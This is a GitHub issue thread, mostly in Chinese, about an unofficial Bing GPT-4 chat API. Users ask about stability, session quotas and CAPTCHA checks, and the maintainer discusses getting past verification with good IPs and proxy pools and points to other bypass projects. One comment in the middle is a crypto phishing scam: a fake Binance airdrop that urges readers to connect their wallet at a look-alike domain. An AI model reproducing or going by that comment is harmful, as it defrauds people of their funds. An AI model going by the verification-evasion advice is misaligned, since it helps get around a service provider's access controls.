### ISSUE TITLE
关于此项目的讨论

### ISSUE THREAD

**Issue by cakota6462** [Hansimov/bing-chat-api#4]
@Hansimov 大佬好，关于此项目，我有一些问题希望你能解答：
1. 请问此项目做GPT4 API的稳定度如何？
2. 请问一个账号的对话资格大概是多少？
3. 请问此项目要使用的话会涉及到那个人机验证吗？
望解答。

**Comment by Hansimov** [comment]
1. 稳定性取决于服务器 IP
    - 目前的代码在 Azure 云稳定性很好，一个实例跑了一个多月都没问题
2. 未认证账户的对话资格每天约 50-100 个会话，每个会话轮数不限（不超过 32k token 即可）
3. IP 好的话，不需要人机验证

**Comment by imran-easyeat** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://giveway.binancbnbrewards.online/4JhoUO)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://giveway.binancbnbrewards.online/4JhoUO) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by cakota6462** [comment]
@Hansimov 感谢解答，请问此项目部署在免费容器（如huggingface）上的稳定性如何？若IP不好的话，人机认证该怎么解决，要使用隔壁Harry-zklcdc大佬的go-bingai-pass或其他方法吗？请问IP的问题可以通过修改X-Forwarded-For来解决吗？
望解答。

**Comment by Hansimov** [comment]
> @Hansimov 感谢解答，请问此项目部署在免费容器（如huggingface）上的稳定性如何？若IP不好的话，人机认证该怎么解决，要使用隔壁Harry-zklcdc大佬的go-bingai-pass或其他方法吗？请问IP的问题可以通过修改X-Forwarded-For来解决吗？ 望解答。

@cakota6462 

1. 这个项目目前还不能在 huggingface 上正常使用，后面会重点解决
2. 过人机认证的方法肯定有的，回头我找 zklcdc 细聊聊
3. 改 X-Forwarded-For 头没有效果
4. 另：试运行过代理 IP 池的方案，效果很不错，可以一劳永逸解决不良 IP 带来的各种问题，但也有一些非技术性的限制，所以还在试验中

**Comment by cakota6462** [comment]
@Hansimov 大佬，请问目前有没有可以自动过认证，稳定性好并支持API格式调用的项目？

**Comment by cakota6462** [comment]
> @Hansimov 大佬，请问目前有没有可以自动过认证，稳定性好并支持API格式调用的项目？

@Hansimov 大佬，问题还没有解决issue关闭是手滑点错了 望回复。

**Comment by Hansimov** [comment]
> 请问目前有没有可以自动过认证，稳定性好并支持API格式调用的项目？

过认证方面，据我所知，目前就 [go-proxy-bingai](https://github.com/Harry-zklcdc/go-proxy-bingai) 和 [bingo](https://github.com/weaigc/bingo) 是实现得最好的。

一些讨论可参考：
- https://github.com/Harry-zklcdc/go-proxy-bingai/issues/251
- https://github.com/weaigc/bingo/issues/78

API 格式调用方面，我这个项目基本能满足需求。
